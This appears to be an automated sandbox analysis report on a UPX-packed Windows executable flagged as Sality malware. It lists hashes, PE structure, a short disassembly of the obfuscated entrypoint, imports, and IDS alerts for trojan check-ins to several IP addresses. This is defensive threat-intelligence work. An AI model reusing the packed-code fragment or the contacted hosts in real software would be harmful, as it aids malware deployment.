                                  MD5:4BAB7BD732DE6EBF9D46DADF074DE667
                                  SHA1:F34A89D36AB2BEC3C7D28107B930D894DDBA2B92
                                  SHA-256:2AAEE5E1950682576DC00104FB48B6BD1BABDE2BC526D98052F2B41BDBCC9286
                                  SHA-512:CF4EFEB16A557112ED7C25D654F5CCC38ADEC44CA5B4F949884F9FFC2DDDF19A823A2CFED1185E3AB877D0236FE26907F8CF4DA6B9895517A99C1DA6C8B6648F
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: INDICATOR_EXE_Packed_SimplePolyEngine, Description: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality, Source: C:\lwkdr.exe, Author: ditekSHen
                                  Preview:MZ..........PE..L...yrf<[LordPE]....................@.............@..........................`..............................................`...<....................................................................................................................text....P.......B.................. ...............................`...<....................................................................................................................text............................... ...........................................H.e.l.l.o. .w.o.r.l.d.!.....C.a.p.t.i.o.n............[.....S.......f.....@................................................................................}.ExitProcess.KERNEL32.dll....MessageBoxW.USER32.dll........................................................................................................................................................................................................................................................................

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                  Entropy (8bit):7.920696746398092
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.66%
                                  • UPX compressed Win32 Executable (30571/9) 0.30%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File size:1'233'920 bytes
                                  MD5:99901509a53dfb9c77c1be4d60763afc
                                  SHA1:920a3553a48d9d11a3b02b61d50bcd564330e173
                                  SHA256:181695ba0cdd4904f94b59450af4022fb811da81f386dca90d439f7c66566c0b
                                  SHA512:0cf6738f4c53325bfef02d225d7d297d88b264751278e776fbaabf4a5742c23015611254782475311112421418eda32a1b316283fa7b4b56946bfdd432516cce
                                  SSDEEP:24576:5yEOUslemq04P5AOoBeOa/oBj2FlaJVJZ65Gjl8Kbahu:5srqHoBeOa/oIaJs+lHmhu
                                  TLSH:D2452302C2B22E67D93B8538F32A10E3E54E8D1658625073BE5EFF8916F9BF42941D47
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................2.......................................2...................V...Y.......Y...............v......

                                  File Icon

                                  Icon Hash:a2aaae86ae8e86e0

                                  Static PE Info

                                  General

                                  Entrypoint:0x638000
                                  Entrypoint Section:cu
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                  DLL Characteristics:
                                  Time Stamp:0x5F6EE09C [Sat Sep 26 06:33:00 2020 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:98ee450359fb8eda1fdf6c76521f661e

                                  Entrypoint Preview

                                  Instruction
                                  sub edi, 3F334B51h
                                  sbb bl, cl
                                  sub eax, ebx
                                  and bh, ch
                                  inc eax
                                  imul ebp, ebp
                                  add dh, FFFFFFFFh
                                  test ebp, ebx
                                  sbb ebx, edi
                                  mov ebp, ecx
                                  inc ecx
                                  sub esi, 000081DCh
                                  mov bh, FFFFFFA9h
                                  adc edi, ebp
                                  xchg bl, bh
                                  xchg ch, bl
                                  cmp ebp, ebx
                                  jnc 00007F3F1880C0E8h
                                  mov edx, 28FAC94Bh
                                  call 00007F3F1880C0E5h
                                  or dh, FFFFFFE9h
                                  xor edi, ebx
                                  xchg ch, bh
                                  test eax, edx
                                  test eax, ecx
                                  or ecx, ebp
                                  mov dh, 16h
                                  dec bl
                                  cmp esi, 00006DC6h
                                  pop edi
                                  and ecx, 8912F310h
                                  mov al, bh
                                  lea ecx, dword ptr [A0A5FC0Bh]
                                  add edi, 00005AA2h
                                  inc edx
                                  lea ebp, dword ptr [35C17C13h]
                                  sub edi, 00000A0Dh
                                  lea ebp, dword ptr [43460DADh]
                                  lea eax, dword ptr [34AE1B94h]
                                  sbb al, ah
                                  xchg al, dh
                                  imul esi, ebx, 8ADFA0EFh
                                  sbb edx, ebx
                                  lea eax, dword ptr [0000009Bh]
                                  lea edx, dword ptr [A3FA3A70h]
                                  lea esi, dword ptr [19F00371h]
                                  xor dl, dl
                                  imul eax, eax, 07h
                                  mov dh, cl
                                  dec edx
                                  xchg cl, dl
                                  add ebx, eax
                                  dec edx
                                  add ebx, 00000091h
                                  jne 00007F3F1880C0E4h
                                  and edx, ecx
                                  lea eax, dword ptr [6FC01310h]
                                  inc ebp
                                  xor edx, 000033DCh

                                  Rich Headers

                                  Programming Language:
                                  • [C++] VS98 (6.0) SP6 build 8804
                                  • [ C ] VS98 (6.0) SP6 build 8804
                                  • [C++] VS98 (6.0) build 8168
                                  • [ C ] VS98 (6.0) build 8168
                                  • [EXP] VC++ 6.0 SP5 build 8804

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2261d80x2c4.rsrc
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2240000x21d8.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  UPX00x10000x1230000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  UPX10x1240000x1000000x10000003ef3942214809a5c7f1fdbf3a77b3d0False0.9743185043334961data7.924552696829606IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x2240000x140000x14000fbd1380d886d6fff83c6f5b97f5a8cb7False0.89351806640625data7.708524676179253IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  cu0x2380000x190000x190003e547cae9ca476aa654971ec923e3dfbFalse0.9282421875data7.774178931521131IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  TEXTINCLUDE0x21abf40xbdataChineseChina1.7272727272727273
                                  TEXTINCLUDE0x21ac000x16dataChineseChina1.4090909090909092
                                  TEXTINCLUDE0x21ac180x151dataChineseChina1.032640949554896
                                  RT_CURSOR0x21ad6c0x134dataChineseChina1.0357142857142858
                                  RT_CURSOR0x21aea00x134dataChineseChina1.0357142857142858
                                  RT_CURSOR0x21afd40x134dataChineseChina1.0357142857142858
                                  RT_CURSOR0x21b1080xb4dataChineseChina1.0611111111111111
                                  RT_BITMAP0x21b1bc0x16cdataChineseChina1.0302197802197801
                                  RT_BITMAP0x21b3280x248dataChineseChina1.018835616438356
                                  RT_BITMAP0x21b5700x144dataChineseChina1.0339506172839505
                                  RT_BITMAP0x21b6b40x158dataChineseChina0.997093023255814
                                  RT_BITMAP0x21b80c0x158dataChineseChina1.0203488372093024
                                  RT_BITMAP0x21b9640x158dataChineseChina1.0232558139534884
                                  RT_BITMAP0x21babc0x158dataChineseChina1.0319767441860466
                                  RT_BITMAP0x21bc140x158dataChineseChina1.0319767441860466
                                  RT_BITMAP0x21bd6c0x158dataChineseChina1.0319767441860466
                                  RT_BITMAP0x21bec40x158dataChineseChina1.0319767441860466
                                  RT_BITMAP0x21c01c0x158dataChineseChina1.0319767441860466
                                  RT_BITMAP0x21c1740x5e4dataChineseChina0.9927055702917772
                                  RT_BITMAP0x21c7580xb8dataChineseChina1.059782608695652
                                  RT_BITMAP0x21c8100x16cdataChineseChina1.0302197802197801
                                  RT_BITMAP0x21c97c0x144dataChineseChina1.0339506172839505
                                  RT_ICON0x21cac00x2e8dataChineseChina1.0147849462365592
                                  RT_ICON0x21cda80x128dataChineseChina1.037162162162162
                                  RT_ICON0x224bf80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.299484052532833
                                  RT_MENU0x21df780xcNon-ISO extended-ASCII text, with no line terminatorsChineseChina1.75
                                  RT_MENU0x21df840x284dataChineseChina1.0170807453416149
                                  RT_DIALOG0x21e2080x98dataChineseChina1.0723684210526316
                                  RT_DIALOG0x21e2a00x17adataChineseChina1.029100529100529
                                  RT_DIALOG0x21e41c0xfadataChineseChina1.044
                                  RT_DIALOG0x21e5180xeadataChineseChina1.047008547008547
                                  RT_DIALOG0x21e6040x8aedataChineseChina1.004950495049505
                                  RT_DIALOG0x21eeb40xb2dataChineseChina1.0617977528089888
                                  RT_DIALOG0x21ef680xccdataChineseChina1.053921568627451
                                  RT_DIALOG0x21f0340xb2dataChineseChina1.0617977528089888
                                  RT_DIALOG0x21f0e80xe2dataChineseChina0.9026548672566371
                                  RT_DIALOG0x21f1cc0x18cdataChineseChina0.9090909090909091
                                  RT_STRING0x21f3580x50dataChineseChina1.1375
                                  RT_STRING0x21f3a80x2cdataChineseChina1.1818181818181819
                                  RT_STRING0x21f3d40x78dataChineseChina1.0916666666666666
                                  RT_STRING0x21f44c0x1c4dataChineseChina1.0243362831858407
                                  RT_STRING0x21f6100x12adataChineseChina1.0369127516778522
                                  RT_STRING0x21f73c0x146dataChineseChina1.0337423312883436
                                  RT_STRING0x21f8840x40dataChineseChina1.140625
                                  RT_STRING0x21f8c40x64dataChineseChina1.11
                                  RT_STRING0x21f9280x1d8dataChineseChina1.0233050847457628
                                  RT_STRING0x21fb000x114dataChineseChina1.039855072463768
                                  RT_STRING0x21fc140x24dataChineseChina1.25
                                  RT_GROUP_CURSOR0x21fc380x14dataChineseChina1.45
                                  RT_GROUP_CURSOR0x21fc4c0x14dataChineseChina1.45
                                  RT_GROUP_CURSOR0x21fc600x22dataChineseChina1.3235294117647058
                                  RT_GROUP_ICON0x225ca40x14data1.2
                                  RT_GROUP_ICON0x21fc980x14dataChineseChina1.45
                                  RT_GROUP_ICON0x21fcac0x14dataChineseChina1.45
                                  RT_VERSION0x225cbc0x25cdataChineseChina0.478476821192053
                                  RT_MANIFEST0x225f1c0x2b9XML 1.0 document, ASCII text, with very long lines (697), with no line terminators0.5279770444763271

                                  Imports

                                  DLLImport
                                  ADVAPI32.dllRegCloseKey
                                  COMCTL32.dll
                                  comdlg32.dllChooseColorA
                                  GDI32.dllLineTo
                                  KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
                                  ole32.dllOleRun
                                  OLEAUT32.dllVariantClear
                                  SHELL32.dllSHGetMalloc
                                  USER32.dllGetDC
                                  WINMM.dllwaveOutOpen
                                  WINSPOOL.DRVClosePrinter
                                  WLDAP32.dll
                                  WS2_32.dllntohl

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  ChineseChina

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  07/05/24-08:04:16.384829TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24997680192.168.2.937.230.104.89
                                  07/05/24-08:02:51.047560TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24985980192.168.2.944.221.84.105
                                  07/05/24-08:04:54.453187TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25002880192.168.2.944.221.84.105
                                  07/05/24-08:03:51.747375TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24994280192.168.2.954.244.188.177
                                  07/05/24-08:04:32.879197TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24999980192.168.2.978.46.2.155
                                  07/05/24-08:02:25.220413TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24982680192.168.2.954.244.188.177
                                  07/05/24-08:03:39.035937TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24992480192.168.2.954.244.188.177
                                  07/05/24-08:01:51.583508TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24978280192.168.2.944.221.84.105
                                  07/05/24-08:04:03.711478TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24995880192.168.2.937.230.104.89
                                  07/05/24-08:02:52.362722TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24986180192.168.2.978.46.2.155
                                  07/05/24-08:01:46.533505TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24977480192.168.2.954.244.188.177
                                  07/05/24-08:03:04.888641TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24987780192.168.2.944.221.84.105
                                  07/05/24-08:03:26.499895TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24990680192.168.2.954.244.188.177
                                  07/05/24-08:02:39.967800TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24984580192.168.2.937.230.104.89
                                  07/05/24-08:01:05.876740TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24972080192.168.2.978.46.2.155
                                  07/05/24-08:02:06.282663TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24980180192.168.2.944.221.84.105
                                  07/05/24-08:01:25.842606TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24974780192.168.2.937.230.104.89
                                  07/05/24-08:03:57.813372TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24995180192.168.2.978.46.2.155
                                  07/05/24-08:01:45.423525TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24977380192.168.2.937.230.104.89
                                  07/05/24-08:03:00.800339TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24987280192.168.2.944.221.84.105
                                  07/05/24-08:03:44.518591TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24993280192.168.2.944.221.84.105
                                  07/05/24-08:02:57.875725TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24986880192.168.2.937.230.104.89
                                  07/05/24-08:01:14.294188TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24973280192.168.2.937.230.104.89
                                  07/05/24-08:02:47.224288TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24985480192.168.2.944.221.84.105
                                  07/05/24-08:03:17.747873TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24989580192.168.2.944.221.84.105
                                  07/05/24-08:01:38.826477TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24976480192.168.2.954.244.188.177
                                  07/05/24-08:03:56.777090TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24994980192.168.2.944.221.84.105
                                  07/05/24-08:03:31.979693TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24991480192.168.2.944.221.84.105
                                  07/05/24-08:04:05.322599TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24996080192.168.2.954.244.188.177
                                  07/05/24-08:02:33.421324TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24983680192.168.2.954.244.188.177
                                  07/05/24-08:01:02.715930TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24971480192.168.2.937.230.104.89
                                  07/05/24-08:03:14.125997TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24989080192.168.2.944.221.84.105
                                  07/05/24-08:03:29.008750TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24991080192.168.2.937.230.104.89
                                  07/05/24-08:01:18.587394TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24973780192.168.2.937.230.104.89
                                  07/05/24-08:04:23.272516TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24998580192.168.2.944.221.84.105
                                  07/05/24-08:04:58.079006TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 26385280192.168.2.954.244.188.177
                                  07/05/24-08:01:31.374585TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24975480192.168.2.944.221.84.105
                                  07/05/24-08:03:57.315620TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24995080192.168.2.944.221.84.105
                                  07/05/24-08:04:10.377597TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24996780192.168.2.944.221.84.105
                                  07/05/24-08:04:19.199996TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24998080192.168.2.944.221.84.105
                                  07/05/24-08:03:23.091025TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24990380192.168.2.978.46.2.155
                                  07/05/24-08:01:09.815492TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24972580192.168.2.978.46.2.155
                                  07/05/24-08:02:36.104939TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24984080192.168.2.937.230.104.89
                                  07/05/24-08:01:52.115368TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24978380192.168.2.978.46.2.155
                                  07/05/24-08:01:55.289827TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24978780192.168.2.944.221.84.105
                                  07/05/24-08:04:43.101344TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25001280192.168.2.937.230.104.89
                                  07/05/24-08:01:00.378372TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24971180192.168.2.944.221.84.105
                                  07/05/24-08:02:11.864140TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24980980192.168.2.937.230.104.89
                                  07/05/24-08:03:08.435078TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24988280192.168.2.954.244.188.177
                                  07/05/24-08:03:48.306224TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24993780192.168.2.944.221.84.105
                                  07/05/24-08:02:41.070663TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24984680192.168.2.954.244.188.177
                                  07/05/24-08:03:45.078245TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24993380192.168.2.978.46.2.155
                                  07/05/24-08:04:40.542377TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25000880192.168.2.954.244.188.177
                                  07/05/24-08:02:24.133917TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24982580192.168.2.937.230.104.89
                                  07/05/24-08:01:22.240417TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24974280192.168.2.937.230.104.89
                                  07/05/24-08:04:32.368995TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24999880192.168.2.944.221.84.105
                                  07/05/24-08:01:24.084115TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24974480192.168.2.944.221.84.105
                                  07/05/24-08:03:14.638885TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24989180192.168.2.978.46.2.155
                                  07/05/24-08:03:11.102105TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24988680192.168.2.937.230.104.89
                                  07/05/24-08:03:41.600019TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24992880192.168.2.937.230.104.89
                                  07/05/24-08:02:45.687757TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24985280192.168.2.954.244.188.177
                                  07/05/24-08:02:13.749688TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24981180192.168.2.944.221.84.105
                                  07/05/24-08:01:50.293630TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24977980192.168.2.954.244.188.177
                                  07/05/24-08:01:15.390551TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24973380192.168.2.954.244.188.177
                                  07/05/24-08:01:19.716191TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24973880192.168.2.954.244.188.177
                                  07/05/24-08:01:55.807714TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24978880192.168.2.978.46.2.155
                                  07/05/24-08:02:17.677812TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24981680192.168.2.944.221.84.105
                                  07/05/24-08:04:46.675224TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25001780192.168.2.978.46.2.155
                                  07/05/24-08:01:00.929388TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24971280192.168.2.978.46.2.155
                                  07/05/24-08:04:29.304615TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24999480192.168.2.937.230.104.89
                                  07/05/24-08:04:25.126569TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24998880192.168.2.937.230.104.89
                                  07/05/24-08:04:36.425758TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25000380192.168.2.944.221.84.105
                                  07/05/24-08:03:43.181784TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24993080192.168.2.954.244.188.177
                                  07/05/24-08:03:22.560088TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24990280192.168.2.944.221.84.105
                                  07/05/24-08:02:37.295683TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24984180192.168.2.954.244.188.177
                                  07/05/24-08:04:41.836037TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25001080192.168.2.944.221.84.105
                                  07/05/24-08:01:23.310866TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24974380192.168.2.954.244.188.177
                                  07/05/24-08:01:37.124711TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24976280192.168.2.937.230.104.89
                                  07/05/24-08:02:07.323810TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24980380192.168.2.978.46.2.155
                                  07/05/24-08:03:09.327857TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24988380192.168.2.944.221.84.105
                                  07/05/24-08:01:41.547579TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24976880192.168.2.937.230.104.89
                                  07/05/24-08:03:30.699932TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24991280192.168.2.954.244.188.177
                                  07/05/24-08:03:01.331912TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24987380192.168.2.978.46.2.155
                                  07/05/24-08:03:54.351124TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24994680192.168.2.937.230.104.89
                                  07/05/24-08:04:45.972513TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25001680192.168.2.944.221.84.105
                                  07/05/24-08:01:44.041870TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24977180192.168.2.944.221.84.105
                                  07/05/24-08:01:36.422487TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24976180192.168.2.978.46.2.155
                                  07/05/24-08:02:08.035151TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24980480192.168.2.937.230.104.89
                                  07/05/24-08:04:13.824450TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24997280192.168.2.954.244.188.177
                                  07/05/24-08:01:30.640342TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24975380192.168.2.954.244.188.177
                                  07/05/24-08:04:18.703803TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24997980192.168.2.944.221.84.105
                                  07/05/24-08:02:51.809341TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24986080192.168.2.944.221.84.105
                                  07/05/24-08:03:06.072074TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24987980192.168.2.978.46.2.155
                                  07/05/24-08:03:50.148608TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24994080192.168.2.937.230.104.89
                                  07/05/24-08:04:26.728282TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24999080192.168.2.954.244.188.177
                                  07/05/24-08:02:19.462964TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24981980192.168.2.937.230.104.89
                                  07/05/24-08:03:13.551847TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24988980192.168.2.944.221.84.105
                                  07/05/24-08:04:17.963435TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24997880192.168.2.954.244.188.177
                                  07/05/24-08:01:09.303762TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24972480192.168.2.944.221.84.105
                                  07/05/24-08:02:30.032193TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24983280192.168.2.944.221.84.105
                                  07/05/24-08:01:35.317999TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24975980192.168.2.944.221.84.105
                                  07/05/24-08:01:49.164275TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24977880192.168.2.937.230.104.89
                                  07/05/24-08:04:31.659976TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24999780192.168.2.944.221.84.105
                                  07/05/24-08:03:34.820235TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24991880192.168.2.954.244.188.177
                                  07/05/24-08:04:58.814550TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 26385380192.168.2.944.221.84.105
                                  07/05/24-08:04:06.666109TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24996280192.168.2.944.221.84.105
                                  07/05/24-08:01:40.362555TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24976680192.168.2.944.221.84.105
                                  07/05/24-08:04:19.958289TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24998180192.168.2.978.46.2.155
                                  07/05/24-08:04:38.467559TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25000680192.168.2.937.230.104.89
                                  07/05/24-08:04:24.299488TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24998780192.168.2.978.46.2.155
                                  07/05/24-08:03:53.128186TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24994480192.168.2.944.221.84.105
                                  07/05/24-08:02:43.840428TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24985080192.168.2.937.230.104.89
                                  07/05/24-08:01:32.384198TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24975680192.168.2.978.46.2.155
                                  07/05/24-08:04:11.461784TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24996980192.168.2.978.46.2.155
                                  07/05/24-08:04:27.487510TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24999180192.168.2.944.221.84.105
                                  07/05/24-08:03:28.298626TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24990980192.168.2.978.46.2.155
                                  07/05/24-08:03:39.796014TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24992580192.168.2.944.221.84.105
                                  07/05/24-08:02:54.752862TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24986480192.168.2.954.244.188.177
                                  07/05/24-08:02:59.487756TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24987080192.168.2.954.244.188.177
                                  07/05/24-08:03:35.614319TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24991980192.168.2.944.221.84.105
                                  07/05/24-08:01:51.063459TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24978180192.168.2.944.221.84.105
                                  07/05/24-08:02:50.247950TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24985880192.168.2.954.244.188.177
                                  07/05/24-08:01:42.749015TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24976980192.168.2.954.244.188.177
                                  07/05/24-08:04:33.587885TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25000080192.168.2.937.230.104.89
                                  07/05/24-08:01:57.818703TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24979080192.168.2.954.244.188.177
                                  07/05/24-08:04:54.953451TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25002980192.168.2.978.46.2.155
                                  07/05/24-08:02:38.250500TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24984280192.168.2.944.221.84.105
                                  07/05/24-08:03:19.573920TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24989880192.168.2.937.230.104.89
                                  07/05/24-08:01:25.151668TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24974680192.168.2.978.46.2.155
                                  07/05/24-08:03:36.683929TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24992180192.168.2.978.46.2.155
                                  07/05/24-08:02:27.230078TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24982980192.168.2.978.46.2.155
                                  07/05/24-08:03:43.954296TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24993180192.168.2.944.221.84.105
                                  07/05/24-08:03:32.479378TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 24991580192.168.2.978.46.2.155
                                  07/05/24-08:04:53.161826TCP2804830ETPRO TROJAN Win32.Sality.bh Checkin 25002680192.168.2.954.244.188.177
